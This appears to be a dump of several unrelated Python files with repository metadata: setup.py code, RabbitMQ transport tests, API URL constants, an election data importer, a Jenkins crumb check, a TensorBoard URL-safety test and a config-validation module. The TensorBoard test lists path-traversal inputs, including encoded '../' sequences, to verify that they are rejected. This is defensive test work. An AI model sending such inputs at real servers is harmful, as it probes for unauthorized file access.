EXTRAS_REQUIRE = {
"tests": [
"pytest"],
"docs": []
}
setup(
name="nncf",
version=find_version(os.path.join(here, "nncf/version.py")),
author="Intel",
author_email="alexander.kozlov@intel.com",
description="Neural Networks Compression Framework",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/openvinotoolkit/nncf_pytorch",
packages=find_packages(exclude=["tests", "tests.*",
"examples", "examples.*",
"tools", "tools.*"]),
dependency_links=DEPENDENCY_LINKS,
classifiers=[
"Programming Language :: Python :: 3",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
install_requires=INSTALL_REQUIRES,
extras_require=EXTRAS_REQUIRE,
keywords=["compression", "quantization", "sparsity", "mixed-precision-training",
"quantization-aware-training", "hawq", "classification",
"pruning", "object-detection", "semantic-segmentation", "nlp",
"bert", "transformers", "mmdetection"],
include_package_data=True
)
path_to_ninja = glob.glob(str(sysconfig.get_paths()["purelib"]+"/ninja*/ninja/data/bin/"))
if path_to_ninja:
path_to_ninja = str(path_to_ninja[0]+"ninja")
if not os.access(path_to_ninja, os.X_OK):
st = os.stat(path_to_ninja)
os.chmod(path_to_ninja, st.st_mode | stat.S_IEXEC)
| 32.944785
| 117
| 0.600931
|
5c1e050d252df0a765cd0e48e1d90b5c0a4f42e2
| 17,432
|
py
|
Python
|
tests/test_transport/test_rabbit_mq.py
|
maxipavlovic/django-cqrs
|
d401819b5bca7c2e833d44e8426251fdd4b6b8b9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_transport/test_rabbit_mq.py
|
maxipavlovic/django-cqrs
|
d401819b5bca7c2e833d44e8426251fdd4b6b8b9
|
[
"Apache-2.0"
] | null | null | null |
tests/test_transport/test_rabbit_mq.py
|
maxipavlovic/django-cqrs
|
d401819b5bca7c2e833d44e8426251fdd4b6b8b9
|
[
"Apache-2.0"
] | null | null | null |
# Copyright © 2021 Ingram Micro Inc. All rights reserved.
import logging
from datetime import datetime, timedelta, timezone
from importlib import import_module, reload
from dj_cqrs.constants import SignalType
from dj_cqrs.dataclasses import TransportPayload
from dj_cqrs.delay import DelayMessage, DelayQueue
from dj_cqrs.transport.rabbit_mq import RabbitMQTransport
from django.db import DatabaseError
from pika.exceptions import AMQPError
import pytest
from tests.utils import db_error
import ujson
class PublicRabbitMQTransport(RabbitMQTransport):
@classmethod
def get_common_settings(cls):
return cls._get_common_settings()
@classmethod
def get_consumer_settings(cls):
return cls._get_consumer_settings()
@classmethod
def get_produced_message_routing_key(cls, *args):
return cls._get_produced_message_routing_key(*args)
@classmethod
def consume_message(cls, *args):
return cls._consume_message(*args)
@classmethod
def delay_message(cls, *args):
return cls._delay_message(*args)
@classmethod
def fail_message(cls, *args):
return cls._fail_message(*args)
@classmethod
def process_delay_messages(cls, *args):
return cls._process_delay_messages(*args)
@classmethod
def produce_message(cls, *args):
return cls._produce_message(*args)
def test_default_settings():
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'localhost'
assert s[1] == 5672
assert s[2].username == 'guest' and s[2].password == 'guest'
assert s[3] == 'cqrs'
def test_non_default_settings(settings, caplog):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'host': 'rabbit',
'port': 8000,
'user': 'usr',
'password': 'pswd',
'exchange': 'exchange',
}
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'rabbit'
assert s[1] == 8000
assert s[2].username == 'usr' and s[2].password == 'pswd'
assert s[3] == 'exchange'
def test_default_url_settings(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'url': 'amqp://localhost',
}
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'localhost'
assert s[1] == 5672
assert s[2].username == 'guest' and s[2].password == 'guest'
assert s[3] == 'cqrs'
def test_non_default_url_settings(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'url': 'amqp://usr:pswd@rabbit:8000',
'exchange': 'exchange',
}
s = PublicRabbitMQTransport.get_common_settings()
assert s[0] == 'rabbit'
assert s[1] == 8000
assert s[2].username == 'usr' and s[2].password == 'pswd'
assert s[3] == 'exchange'
def test_invalid_url_settings(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'url': 'rabbit://localhost',
}
with pytest.raises(AssertionError) as ei:
PublicRabbitMQTransport.get_common_settings()
assert ei.match('Scheme must be "amqp" for RabbitMQTransport.')
def test_consumer_default_settings(settings):
settings.CQRS['queue'] = 'replica'
settings.CQRS['replica'].pop('dead_letter_queue', None)
s = PublicRabbitMQTransport.get_consumer_settings()
assert s[1] == 'dead_letter_replica'
assert s[2] == 1001
def test_consumer_non_default_settings(settings, caplog):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'queue': 'q',
'consumer_prefetch_count': 2,
'replica': {
'delay_queue_max_size': None, # Infinite
},
}
s = PublicRabbitMQTransport.get_consumer_settings()
assert s[0] == 'q'
assert s[1] == 'dead_letter_q'
assert s[2] == 0 # Infinite
assert "The 'consumer_prefetch_count' setting is ignored for RabbitMQTransport." in caplog.text
@pytest.fixture
def rabbit_transport(settings):
settings.CQRS = {
'transport': 'dj_cqrs.transport.rabbit_mq.RabbitMQTransport',
'queue': 'replica',
}
module = reload(import_module('dj_cqrs.transport'))
yield module.current_transport
def amqp_error(*args, **kwargs):
raise AMQPError
def test_produce_connection_error(rabbit_transport, mocker, caplog):
mocker.patch.object(RabbitMQTransport, '_get_producer_rmq_objects', side_effect=amqp_error)
rabbit_transport.produce(
TransportPayload(
SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1,
),
)
assert "CQRS couldn't be published: pk = 1 (CQRS_ID)." in caplog.text
def test_produce_publish_error(rabbit_transport, mocker, caplog):
mocker.patch.object(
RabbitMQTransport, '_get_producer_rmq_objects', return_value=(mocker.MagicMock(), None),
)
mocker.patch.object(RabbitMQTransport, '_produce_message', side_effect=amqp_error)
rabbit_transport.produce(
TransportPayload(
SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1,
),
)
assert "CQRS couldn't be published: pk = 1 (CQRS_ID)." in caplog.text
def test_produce_ok(rabbit_transport, mocker, caplog):
caplog.set_level(logging.INFO)
mocker.patch.object(
RabbitMQTransport, '_get_producer_rmq_objects', return_value=(mocker.MagicMock(), None),
)
mocker.patch.object(RabbitMQTransport, '_produce_message', return_value=True)
rabbit_transport.produce(
TransportPayload(
SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1,
),
)
assert 'CQRS is published: pk = 1 (CQRS_ID)' in caplog.text
def test_produce_message_ok(mocker):
expires = datetime(2100, 1, 1, tzinfo=timezone.utc)
expected_expires = '2100-01-01T00:00:00+00:00'
channel = mocker.MagicMock()
payload = TransportPayload(
SignalType.SAVE,
cqrs_id='cqrs_id',
instance_data={},
instance_pk='id',
previous_data={'e': 'f'},
expires=expires,
retries=2,
)
PublicRabbitMQTransport.produce_message(channel, 'exchange', payload)
assert channel.basic_publish.call_count == 1
basic_publish_kwargs = channel.basic_publish.call_args[1]
assert ujson.loads(basic_publish_kwargs['body']) == {
'signal_type': SignalType.SAVE,
'cqrs_id': 'cqrs_id',
'instance_data': {},
'instance_pk': 'id',
'previous_data': {'e': 'f'},
'correlation_id': None,
'expires': expected_expires,
'retries': 2,
}
assert basic_publish_kwargs['exchange'] == 'exchange'
assert basic_publish_kwargs['mandatory']
assert basic_publish_kwargs['routing_key'] == 'cqrs_id'
assert basic_publish_kwargs['properties'].content_type == 'text/plain'
assert basic_publish_kwargs['properties'].delivery_mode == 2
def test_produce_sync_message_no_queue(mocker):
channel = mocker.MagicMock()
payload = TransportPayload(SignalType.SYNC, 'cqrs_id', {}, None)
PublicRabbitMQTransport.produce_message(channel, 'exchange', payload)
basic_publish_kwargs = channel.basic_publish.call_args[1]
assert ujson.loads(basic_publish_kwargs['body']) == {
'signal_type': SignalType.SYNC,
'cqrs_id': 'cqrs_id',
'instance_data': {},
'instance_pk': None,
'previous_data': None,
'correlation_id': None,
'expires': None,
'retries': 0,
}
assert basic_publish_kwargs['routing_key'] == 'cqrs_id'
def test_produce_sync_message_queue(mocker):
channel = mocker.MagicMock()
payload = TransportPayload(SignalType.SYNC, 'cqrs_id', {}, 'id', 'queue')
PublicRabbitMQTransport.produce_message(channel, 'exchange', payload)
basic_publish_kwargs = channel.basic_publish.call_args[1]
assert ujson.loads(basic_publish_kwargs['body']) == {
'signal_type': SignalType.SYNC,
'cqrs_id': 'cqrs_id',
'instance_data': {},
'instance_pk': 'id',
'previous_data': None,
'correlation_id': None,
'expires': None,
'retries': 0,
}
assert basic_publish_kwargs['routing_key'] == 'cqrs.queue.cqrs_id'
def test_consume_connection_error(rabbit_transport, mocker, caplog):
mocker.patch.object(
RabbitMQTransport, '_get_consumer_rmq_objects', side_effect=amqp_error,
)
mocker.patch('time.sleep', side_effect=db_error)
with pytest.raises(DatabaseError):
rabbit_transport.consume()
assert 'AMQP connection error. Reconnecting...' in caplog.text
def test_consume_ok(rabbit_transport, mocker):
consumer_generator = (v for v in [(1, None, None)])
mocker.patch.object(
RabbitMQTransport,
'_get_consumer_rmq_objects',
return_value=(None, None, consumer_generator),
)
mocker.patch.object(
RabbitMQTransport, '_consume_message', db_error,
)
with pytest.raises(DatabaseError):
rabbit_transport.consume()
def test_consume_message_ack(mocker, caplog):
caplog.set_level(logging.INFO)
consumer_mock = mocker.patch('dj_cqrs.controller.consumer.consume')
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(),
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"cqrs_id","instance_data":{},'
'"instance_pk":1, "previous_data":{}, "correlation_id":"abc",'
'"expires":"2100-01-01T00:00:00+00:00", "retries":1}',
mocker.MagicMock(),
)
assert consumer_mock.call_count == 1
payload = consumer_mock.call_args[0][0]
assert payload.signal_type == 'signal'
assert payload.cqrs_id == 'cqrs_id'
assert payload.instance_data == {}
assert payload.previous_data == {}
assert payload.pk == 1
assert payload.correlation_id == 'abc'
assert payload.expires == datetime(2100, 1, 1, tzinfo=timezone.utc)
assert payload.retries == 1
assert 'CQRS is received: pk = 1 (cqrs_id), correlation_id = abc.' in caplog.text
assert 'CQRS is applied: pk = 1 (cqrs_id), correlation_id = abc.' in caplog.text
def test_consume_message_nack(mocker, caplog):
caplog.set_level(logging.INFO)
mocker.patch('dj_cqrs.controller.consumer.consume', return_value=None)
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(),
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"basic","instance_data":{},'
'"instance_pk":1,"previous_data":null,'
'"expires":"2100-01-01T00:00:00+00:00", "retries":0}',
mocker.MagicMock(),
)
assert 'CQRS is received: pk = 1 (basic), correlation_id = None.' in caplog.text
assert 'CQRS is failed: pk = 1 (basic), correlation_id = None, retries = 0.' in caplog.text
def test_consume_message_nack_deprecated_structure(mocker, caplog):
caplog.set_level(logging.INFO)
consumer_mock = mocker.patch('dj_cqrs.controller.consumer.consume', return_value=None)
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(),
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"cqrs_id","instance_data":{}}',
mocker.MagicMock(),
)
assert consumer_mock.call_count == 0
assert "CQRS couldn't proceed, instance_pk isn't found in body" in caplog.text
def test_consume_message_expired(mocker, caplog):
caplog.set_level(logging.INFO)
channel = mocker.MagicMock()
PublicRabbitMQTransport.consume_message(
channel,
mocker.MagicMock(),
None,
'{"signal_type":"signal","cqrs_id":"cqrs_id","instance_data":{},'
'"instance_pk":1,"previous_data":null,'
'"expires":"2000-01-01T00:00:00+00:00", "retries":0}',
mocker.MagicMock(),
)
assert channel.basic_nack.call_count == 1
assert 'CQRS is received: pk = 1 (cqrs_id)' in caplog.text
assert 'CQRS is added to dead letter queue: pk = 1 (cqrs_id)' in caplog.text
def test_consume_message_json_parsing_error(mocker, caplog):
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(), mocker.MagicMock(), None, '{bad_payload:', mocker.MagicMock(),
)
assert ": {bad_payload:." in caplog.text
def test_consume_message_package_structure_error(mocker, caplog):
PublicRabbitMQTransport.consume_message(
mocker.MagicMock(), mocker.MagicMock(), None, 'inv{"pk":"1"}', mocker.MagicMock(),
)
assert """CQRS couldn't be parsed: inv{"pk":"1"}""" in caplog.text
def test_fail_message_with_retry(mocker):
payload = TransportPayload(SignalType.SAVE, 'basic', {'id': 1}, 1)
delay_queue = DelayQueue()
PublicRabbitMQTransport.fail_message(mocker.MagicMock(), 100, payload, None, delay_queue)
assert delay_queue.qsize() == 1
delay_message = delay_queue.get()
assert delay_message.delivery_tag == 100
assert delay_message.payload is payload
def test_message_without_retry_dead_letter(settings, mocker, caplog):
settings.CQRS['replica']['CQRS_MAX_RETRIES'] = 1
produce_message = mocker.patch(
'dj_cqrs.transport.rabbit_mq.RabbitMQTransport._produce_message',
)
channel = mocker.MagicMock()
payload = TransportPayload(
SignalType.SAVE, 'basic', {'id': 1}, 1, correlation_id='abc', retries=2,
)
delay_queue = DelayQueue()
PublicRabbitMQTransport.fail_message(channel, 1, payload, None, delay_queue)
assert delay_queue.qsize() == 0
assert channel.basic_nack.call_count == 1
assert produce_message.call_count == 1
produce_payload = produce_message.call_args[0][2]
assert produce_payload is payload
    assert getattr(produce_payload, 'is_dead_letter', False)
assert 'CQRS is failed: pk = 1 (basic), correlation_id = abc, retries = 2.' in caplog.text
assert (
'CQRS is added to dead letter queue: pk = 1 (basic), correlation_id = abc' in caplog.text
)
def test_fail_message_invalid_model(mocker, caplog):
nack = mocker.patch(
'dj_cqrs.transport.rabbit_mq.RabbitMQTransport._nack',
)
payload = TransportPayload(SignalType.SAVE, 'not_existing', {'id': 1}, 1)
delay_queue = DelayQueue()
delivery_tag = 101
PublicRabbitMQTransport.fail_message(
mocker.MagicMock(), delivery_tag, payload, None, delay_queue,
)
assert delay_queue.qsize() == 0
assert nack.call_count == 1
assert nack.call_args[0][1] == delivery_tag
assert 'Model for cqrs_id not_existing is not found.' in caplog.text
def test_get_produced_message_routing_key_dead_letter(settings):
settings.CQRS['replica']['dead_letter_queue'] = 'dead_letter_replica'
payload = TransportPayload(SignalType.SYNC, 'CQRS_ID', {}, None)
payload.is_dead_letter = True
routing_key = PublicRabbitMQTransport.get_produced_message_routing_key(payload)
assert routing_key == 'cqrs.dead_letter_replica.CQRS_ID'
def test_get_produced_message_routing_key_requeue(settings):
settings.CQRS['queue'] = 'replica'
payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {}, None)
payload.is_requeue = True
routing_key = PublicRabbitMQTransport.get_produced_message_routing_key(payload)
assert routing_key == 'cqrs.replica.CQRS_ID'
def test_process_delay_messages(mocker, caplog):
channel = mocker.MagicMock()
produce = mocker.patch('dj_cqrs.transport.rabbit_mq.RabbitMQTransport.produce')
payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {'id': 1}, 1)
delay_queue = DelayQueue()
delay_queue.put(
DelayMessage(delivery_tag=1, payload=payload, eta=datetime.now(tz=timezone.utc)),
)
PublicRabbitMQTransport.process_delay_messages(channel, delay_queue)
assert delay_queue.qsize() == 0
assert channel.basic_nack.call_count == 1
assert produce.call_count == 1
produce_payload = produce.call_args[0][0]
assert produce_payload is payload
assert produce_payload.retries == 1
assert getattr(produce_payload, 'is_requeue', False)
assert 'CQRS is requeued: pk = 1 (CQRS_ID)' in caplog.text
def test_delay_message_with_requeue(mocker, caplog):
channel = mocker.MagicMock()
requeue_message = mocker.patch(
'dj_cqrs.transport.rabbit_mq.RabbitMQTransport._requeue_message',
)
delay_messages = []
for delay in (2, 1, 3):
payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {'id': delay}, delay)
eta = datetime.now(tz=timezone.utc) + timedelta(hours=delay)
delay_message = DelayMessage(delivery_tag=delay, payload=payload, eta=eta)
delay_messages.append(delay_message)
delay_queue = DelayQueue(max_size=3)
for delay_message in delay_messages:
delay_queue.put(delay_message)
exceeding_delay = 0
exceeding_payload = TransportPayload(SignalType.SAVE, 'CQRS_ID', {'id': 4}, 4)
PublicRabbitMQTransport.delay_message(
channel, 4, exceeding_payload, exceeding_delay, delay_queue,
)
assert delay_queue.qsize() == 3
assert delay_queue.get().payload is exceeding_payload
assert (
'CQRS is delayed: pk = 4 (CQRS_ID), correlation_id = None, delay = 0 sec' in caplog.text
)
assert requeue_message.call_count == 1
requeue_payload = requeue_message.call_args[0][2]
min_eta_delay_message = sorted(delay_messages, key=lambda x: x.eta)[0]
assert requeue_payload is min_eta_delay_message.payload
| 32.221811
| 99
| 0.686324
|
ec7e323c40507e47f815676d07aee98108747612
| 1,377
|
py
|
Python
|
ioapi/api_url.py
|
luisparravicini/ioapi
|
f9d60a28032fd54163ea15b8256aba1d48ec4dcc
|
[
"MIT"
] | null | null | null |
ioapi/api_url.py
|
luisparravicini/ioapi
|
f9d60a28032fd54163ea15b8256aba1d48ec4dcc
|
[
"MIT"
] | null | null | null |
ioapi/api_url.py
|
luisparravicini/ioapi
|
f9d60a28032fd54163ea15b8256aba1d48ec4dcc
|
[
"MIT"
] | 1
|
2020-05-03T04:34:32.000Z
|
2020-05-03T04:34:32.000Z
|
URL_ACCOUNT_STATE = "/api/v2/estadocuenta"
URL_MARKET_RATES = "/api/v2/Cotizaciones/{instrument}/{panel}/{country}"
URL_MUTUAL_FUND = "/api/v2/Titulos/FCI/{symbol}"
URL_MUTUAL_FUND_IN_MARKET = "/api/v2/{market}/Titulos/{symbol}"
URL_MUTUAL_FUND_OPTIONS = "/api/v2/{market}/Titulos/{symbol}/Opciones"
URL_MUTUAL_FUNDS = "/api/v2/Titulos/FCI"
URL_MUTUAL_FUNDS_ADMINS = "/api/v2/Titulos/FCI/Administradoras"
URL_MUTUAL_FUNDS_BY_ADMIN_AND_TYPE = "/api/v2/Titulos/FCI/Administradoras/{admin}/TipoFondos/{fcitype}"
URL_MUTUAL_FUNDS_TYPES = "/api/v2/Titulos/FCI/TipoFondos"
URL_MUTUAL_FUNDS_TYPES_BY_ADMIN = "/api/v2/Titulos/FCI/Administradoras/{admin}/TipoFondos"
URL_INSTRUMENT = "/api/v2/{country}/Titulos/Cotizacion/Paneles/{instrument}"
URL_INSTRUMENTS = "/api/v2/{country}/Titulos/Cotizacion/Instrumentos"
URL_OPERATE_BUY = "/api/v2/operar/Comprar"
URL_OPERATE_SELL = "/api/v2/operar/Vender"
URL_OPERATE_SUBSCRIBE = "/api/v2/operar/suscripcion/fci"
URL_OPERATE_RESCUE = "/api/v2/operar/rescate/fci"
URL_OPERATION = "/api/v2/operaciones/{number}"
URL_OPERATIONS = "/api/v2/operaciones/"
URL_OPERATIONS_DELETE = "/api/v2/operaciones/{number}"
URL_PORTFOLIO = "/api/v2/portafolio/{country}"
URL_STOCK = "/api/v2/{market}/Titulos/{symbol}/Cotizacion"
URL_STOCK_HISTORY = "/api/v2/{market}/Titulos/{symbol}/Cotizacion/seriehistorica/{date_from}/{date_to}/{fit}"
URL_TOKEN = "/token"
| 57.375
| 109
| 0.77923
|
f13e71efc7ba3129ed52bb13b6addc007ec8774b
| 866
|
py
|
Python
|
polling_stations/apps/data_importers/management/commands/import_cardiff.py
|
smsmith97/UK-Polling-Stations
|
ecbd98cb99e89e97354da3960b0063aa36181b11
|
[
"BSD-3-Clause"
] | 29
|
2015-03-10T08:41:34.000Z
|
2022-01-12T08:51:38.000Z
|
polling_stations/apps/data_importers/management/commands/import_cardiff.py
|
smsmith97/UK-Polling-Stations
|
ecbd98cb99e89e97354da3960b0063aa36181b11
|
[
"BSD-3-Clause"
] | 4,112
|
2015-04-01T21:27:38.000Z
|
2022-03-31T19:22:11.000Z
|
polling_stations/apps/data_importers/management/commands/import_cardiff.py
|
smsmith97/UK-Polling-Stations
|
ecbd98cb99e89e97354da3960b0063aa36181b11
|
[
"BSD-3-Clause"
] | 31
|
2015-03-18T14:52:50.000Z
|
2022-02-24T10:31:07.000Z
|
from data_importers.management.commands import BaseXpressDemocracyClubCsvImporter
class Command(BaseXpressDemocracyClubCsvImporter):
council_id = "CRF"
addresses_name = "2021-03-24T16:24:49.782410/cardiff_deduped.tsv"
stations_name = "2021-03-24T16:24:49.782410/cardiff_deduped.tsv"
elections = ["2021-05-06"]
csv_delimiter = "\t"
csv_encoding = "windows-1252"
def address_record_to_dict(self, record):
uprn = record.property_urn.strip().lstrip("0")
if uprn == "100100110392":
return None
if record.addressline6 in [
"CF24 3DZ",
"CF3 0UH",
"CF14 2FN",
"CF14 6PE",
"CF24 4RU",
"CF3 4LL",
"CF5 6HF",
"CF14 9UA",
]:
return None
return super().address_record_to_dict(record)
| 27.0625
| 81
| 0.594688
|
1aa9ce05fe3c8c24013d4dba1c29dfc768a7c2f6
| 988
|
py
|
Python
|
src/main/resources/scripts/crumbDiag.py
|
MatthewQueenan/vectorcast-execution-plugin
|
db8d00239db9ab3229c22378727527d4621ca30e
|
[
"MIT"
] | null | null | null |
src/main/resources/scripts/crumbDiag.py
|
MatthewQueenan/vectorcast-execution-plugin
|
db8d00239db9ab3229c22378727527d4621ca30e
|
[
"MIT"
] | null | null | null |
src/main/resources/scripts/crumbDiag.py
|
MatthewQueenan/vectorcast-execution-plugin
|
db8d00239db9ab3229c22378727527d4621ca30e
|
[
"MIT"
] | null | null | null |
import requests
import sys
import os
verbose=True
try:
username=os.environ['USERNAME']
password=os.environ['PASSWORD']
except:
print "Crumb Diaganostic requires USERNAME/PASSWORD to be set as environment variables"
sys.exit(-1)
jenkins_url=os.environ['JENKINS_URL']
url = jenkins_url + 'crumbIssuer/api/xml?xpath=concat(//crumbRequestField,":",//crumb)'
print(url)
if username:
crumb = requests.get(url, auth=(username, password))
if crumb.status_code == 200:
crumb_headers = dict()
crumb_headers[crumb.text.split(":")[0]] = crumb.text.split(":")[1]
if verbose:
print "Got crumb: %s" % crumb.text
else:
print "Failed to get crumb"
print "\nYou may need to enable \"Prevent Cross Site Request Forgery exploits\" from:"
print "Manage Jenkins > Configure Global Security > CSRF Protection and select the appropriate Crumb Algorithm"
print jenkins_url + "/configureSecurity"
sys.exit(-1)
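# Added follow-up sketch (the endpoint name is illustrative, not from the
# original script): the crumb header built above is meant to accompany later
# Jenkins API requests, e.g.
#   requests.post(jenkins_url + 'createItem', auth=(username, password),
#                 headers=crumb_headers)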
| 35.285714
| 119
| 0.680162
|
500e5dfffbd885300eded76d1e5248f2991d335d
| 3,353
|
py
|
Python
|
tensorboard/examples/plugins/example_raw_scalars/test.py
|
BearerPipelineTest/tensorboard
|
0fa03a9a8309dc137a15645c931e8b625bc3869c
|
[
"Apache-2.0"
] | null | null | null |
tensorboard/examples/plugins/example_raw_scalars/test.py
|
BearerPipelineTest/tensorboard
|
0fa03a9a8309dc137a15645c931e8b625bc3869c
|
[
"Apache-2.0"
] | null | null | null |
tensorboard/examples/plugins/example_raw_scalars/test.py
|
BearerPipelineTest/tensorboard
|
0fa03a9a8309dc137a15645c931e8b625bc3869c
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the example plugin."""
import ntpath
import posixpath
import unittest
from unittest import mock
from werkzeug import test
from werkzeug import wrappers
from tensorboard.plugins import base_plugin
from tensorboard_plugin_example_raw_scalars import plugin
def is_path_safe(path):
"""Returns the result depending on the plugin's static file handler."""
example_plugin = plugin.ExampleRawScalarsPlugin(base_plugin.TBContext())
serve_static_file = example_plugin._serve_static_file
client = test.Client(serve_static_file, wrappers.Response)
response = client.get(plugin._PLUGIN_DIRECTORY_PATH_PART + path)
return response.status_code == 200
class UrlSafetyTest(unittest.TestCase):
def test_path_traversal(self):
"""Properly check whether a URL can be served from the static folder."""
with mock.patch("builtins.open", mock.mock_open(read_data="data")):
self.assertTrue(is_path_safe("static/index.js"))
self.assertTrue(is_path_safe("./static/index.js"))
self.assertTrue(is_path_safe("static/../static/index.js"))
self.assertFalse(is_path_safe("../static/index.js"))
self.assertFalse(is_path_safe("../index.js"))
self.assertFalse(is_path_safe("static2/index.js"))
self.assertFalse(is_path_safe("notstatic/index.js"))
self.assertFalse(is_path_safe("static/../../index.js"))
self.assertFalse(is_path_safe("..%2findex.js"))
self.assertFalse(is_path_safe("%2e%2e/index.js"))
self.assertFalse(is_path_safe("%2e%2e%2findex.js"))
self.assertFalse(
is_path_safe(
"static/../..\\org_tensorflow_tensorboard\\static\\index.js"
)
)
self.assertFalse(
is_path_safe(
"static/../../org_tensorflow_tensorboard/static/index.js"
)
)
self.assertFalse(
is_path_safe(
"static/%2e%2e%2f%2e%2e%5corg_tensorflow_tensorboard%5cstatic%5cindex.js"
)
)
self.assertFalse(
is_path_safe(
"static/%2e%2e%2f%2e%2e%2forg_tensorflow_tensorboard%2fstatic%2findex.js"
)
)
# Test with OS specific path modules.
with mock.patch("os.path", posixpath):
self.assertTrue(is_path_safe("static/\\index.js"))
with mock.patch("os.path", ntpath):
self.assertFalse(is_path_safe("static/\\index.js"))
if __name__ == "__main__":
unittest.main()
| 38.988372
| 93
| 0.632568
|
594e1c1b819a42f9c8c8f0daab1b52842ca64dc0
| 11,888
|
py
|
Python
|
src/yamlfig/test.py
|
ktkalaru/yamlfig
|
a6ddb2c8346ae5695402c25921fdc0d2aaa9b3a1
|
[
"MIT"
] | 1
|
2021-03-26T08:31:18.000Z
|
2021-03-26T08:31:18.000Z
|
src/yamlfig/test.py
|
ktkalaru/yamlfig
|
a6ddb2c8346ae5695402c25921fdc0d2aaa9b3a1
|
[
"MIT"
] | null | null | null |
src/yamlfig/test.py
|
ktkalaru/yamlfig
|
a6ddb2c8346ae5695402c25921fdc0d2aaa9b3a1
|
[
"MIT"
] | null | null | null |
"""Module contains functions that test for common config patterns.
Standard test functions and higher-order functions for use with
yamlfig's rule testing functionality. Function names that begin with
is_* are meant to be passed as the test parameter when instantiating
or adding a YamlConfigRule. Many of the tests include a variant with
match_* which simply takes the value to be tested. Both variants
return None if the test succeeds and a string explaining the error if
not. The match variants are standalone and can incorporate
functionally equivalent testing into other code.
"""
# Standard modules
import os
import re
def is_interval(lower, upper, exclude_lower=False, include_upper=False):
"""Test that value is within the specified interval.
The lower is the bottom of the interval, and upper is the top. By
default, the interval includes the lower bound and excludes the
upper bound, for consistency with python ranges and lots of other
things. In mathematical notation, the default is: [lower, upper)
The exclude_lower flag will exclude the lower bound, and the
include_upper flag will include the upper bound.
    Note that since the implementation relies only on inequality
    comparisons, which are implemented for all objects, providing lower
    and upper of another type (e.g. str) defines the interval
    lexicographically or otherwise, based on the object type.
"""
# pylint: disable=unused-argument # args defined by test definition
lowersym = '(' if exclude_lower else '['
uppersym = ']' if include_upper else ')'
intervalstr = '{0}{1}, {2}{3}'.format(
lowersym, repr(lower), repr(upper), uppersym)
if (lower > upper or (lower == upper and (
exclude_lower or not include_upper))):
raise ValueError('invalid interval "{0}"'.format(intervalstr))
def is_interval_test(conf, path, value):
if value < lower or (value <= lower and exclude_lower):
return u'{0} is below the interval {1}'.format(
repr(value), intervalstr)
if value > upper or (value >= upper and not include_upper):
return u'{0} is above the interval {1}'.format(
repr(value), intervalstr)
return None
return is_interval_test
def is_regex(regex, invert=False):
"""Test that value matches the given regex.
The regular expression is searched against the value, so a match
in the middle of the value will succeed. To specifically match
the beginning or the whole regex, use anchor characters. If
invert is true, then matching the regex will cause the test to
fail.
"""
# pylint: disable=unused-argument # args defined by test definition
rex = re.compile(regex)
def is_regex_test(conf, path, value):
match = rex.search(value)
if invert and match:
return u'"{0}" matches /{1}/'.format(value, regex)
if not invert and not match:
return u'"{0}" does not match /{1}/'.format(value, regex)
return None
return is_regex_test
def match_is_ipv4_address(value):
"""Match given value as a valid dotted-quad IPv4 address."""
# Apply the dotted-quad pattern to the string and detect a mismatch
try:
match = re.search(r'^(\d+)\.(\d+)\.(\d+)\.(\d+)$', value)
except TypeError:
return u'{0} must be a string in IPv4 dotted-quad notation'.format(
repr(value))
if not match:
return u'"{0}" must be in IPv4 dotted-quad notation'.format(
value)
# Validate the range of each octet
octets = [int(x) for x in match.groups()]
for idx, octet in enumerate(octets):
if octet > 255:
return '{0} octet of "{1}" exceeds 255'.format(
['1st', '2nd', '3rd', '4th'][idx], value)
return None
def is_ipv4_address(conf, path, value):
"""Test that value is a valid dotted-quad IPv4 address."""
# pylint: disable=unused-argument # args defined by test definition
return match_is_ipv4_address(value)
def match_is_domain_name(value):
"""Match given value against the format of a DNS domain name.
Primary reference(s):
https://en.wikipedia.org/wiki/Domain_Name_System
"""
# pylint: disable=too-many-return-statements
if value is None or len(value) == 0:
return u'domain {0} cannot be empty'.format(repr(value))
labels = value.split('.')
if len(labels) > 127:
return u'domain "{0}" cannot have more than 127 labels'.format(
value)
for label in labels:
if len(label) == 0:
return u'domain "{0}" cannot have an empty label'.format(value)
if len(label) >= 63:
return u'domain "{0}" cannot have a 63+ byte label'.format(value)
match = re.search('([^A-Za-z0-9-])', label)
if match:
return u'domain "{0}" cannot contain "{1}"'.format(
value, match.group(1))
if label.startswith('-') or label.endswith('-'):
return u'domain "{0}" label cannot start or end with "-"'.format(
value)
if re.search('^[0-9]+$', labels[-1]):
return u'domain "{0}" top-level domain cannot be only digits'.format(
value)
return None
def is_domain_name(conf, path, value):
"""Test that the value matches the format of a DNS domain name."""
